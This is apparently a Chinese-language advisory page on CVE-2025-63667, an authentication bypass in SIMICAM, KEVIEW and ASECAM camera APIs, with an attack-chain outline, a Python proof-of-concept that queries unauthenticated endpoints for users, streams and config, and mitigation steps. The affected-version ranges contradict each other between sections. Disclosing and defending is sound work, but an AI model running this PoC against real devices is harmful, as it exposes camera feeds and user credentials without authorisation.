IPBUF安全漏洞报告
English
CVE-2025-63667 CVSS 7.5 高危

CVE-2025-63667 | SIMICAM/KEVIEW/ASECAM 访问控制绕过漏洞

披露日期: 2025-11-12

漏洞信息

漏洞编号
CVE-2025-63667
漏洞类型
访问控制错误
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
SIMICAM v1.16.41-20250725, KEVIEW v1.14.92-20241120, ASECAM v1.14.10-20240725

相关标签

访问控制绕过未授权访问API安全SIMICAMKEVIEWASECAM摄像头监控CVE-2025-63667网络设备漏洞身份认证绕过

漏洞概述

CVE-2025-63667是影响SIMICAM、KEVIEW和ASECAM三款摄像头监控产品的严重访问控制绕过漏洞。该漏洞存在于这些产品的v1.16.41-20250725、v1.14.92-20241120和v1.14.10-20240725版本中,源于系统对敏感API端点的认证机制实现不当。攻击者可以通过网络直接访问这些未授权的API接口,无需提供任何有效的认证凭证即可获取系统敏感信息。这可能导致摄像头视频流地址、用户凭证、设备配置信息等敏感数据泄露。由于该漏洞利用无需任何权限或用户交互,且可通过互联网直接发起攻击,因此具有极高的实际威胁性。建议受影响的用户尽快联系厂商获取安全更新或采取临时防护措施。

技术细节

该漏洞属于OWASP Top 10中的Broken Access Control(失效的访问控制)类别。在受影响的产品版本中,API端点的身份验证机制存在缺陷,系统未能正确验证请求者的身份即允许访问敏感资源。攻击者可以通过构造特定的HTTP请求直接访问受保护的API端点,例如获取设备列表、修改配置参数或获取视频流地址等。CVSS 3.1评分显示该漏洞的攻击复杂度低(AC:L),无需认证(PR:N)和用户交互(UI:N),攻击向量为网络层面(AV:N),机密性影响为高(C:H),完整性和可用性影响为无。攻击者利用此漏洞可获取摄像头实时视频流、存储的录像文件、用户账户信息以及设备网络配置等敏感数据。

攻击链分析

STEP 1
步骤1
信息收集:攻击者通过 Shodan、Censys 等搜索引擎发现暴露在互联网上的 SIMICAM、KEVIEW 或 ASECAM 摄像头设备
STEP 2
步骤2
漏洞探测:攻击者尝试访问设备的敏感 API 端点,如 /api/device/info、/api/camera/streams 等
STEP 3
步骤3
认证绕过:由于系统存在访问控制缺陷,攻击者无需提供任何认证凭证即可成功访问受保护的 API 端点
STEP 4
步骤4
数据窃取:攻击者获取设备信息、视频流地址、用户列表、配置文件等敏感数据
STEP 5
步骤5
持久化利用:攻击者可能利用获取的信息进一步控制设备或横向移动攻击其他系统

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# CVE-2025-63667 PoC - Unauthenticated API Access # Target: SIMICAM, KEVIEW, ASECAM devices # This PoC demonstrates accessing sensitive API endpoints without authentication import requests import sys def exploit(target_ip, target_port=80): base_url = f"http://{target_ip}:{target_port}" # Sensitive API endpoints that should require authentication api_endpoints = [ "/api/device/info", "/api/user/list", "/api/camera/streams", "/api/config/system", "/api/recording/files" ] print(f"[*] Testing CVE-2025-63667 on {target_ip}:{target_port}") print(f"[*] Target: SIMICAM/KEVIEW/ASECAM with incorrect access control\n") for endpoint in api_endpoints: try: url = base_url + endpoint # No authentication headers - exploiting the vulnerability response = requests.get(url, timeout=10) if response.status_code == 200: print(f"[+] VULNERABLE: {endpoint}") print(f"[+] Status: {response.status_code}") print(f"[+] Response: {response.text[:200]}...\n") else: print(f"[-] Protected: {endpoint} (Status: {response.status_code})") except requests.exceptions.RequestException as e: print(f"[!] Error accessing {endpoint}: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-63667.py <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 exploit(target, port)

影响范围

SIMICAM < v1.16.41-20250725
KEVIEW < v1.14.92-20241120
ASECAM < v1.14.10-20240725

防御指南

临时缓解措施
立即将受影响的 SIMICAM、KEVIEW、ASECAM 设备隔离到受保护的 VLAN 网络中,限制外部网络直接访问。如无法立即升级,可通过防火墙规则阻止对设备管理 API 端点的外部访问,仅允许受信任的内部 IP 地址访问。同时加强网络监控,密切关注异常的 API 访问行为。建议联系厂商获取官方安全补丁,并在测试环境中验证后再进行生产环境部署。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表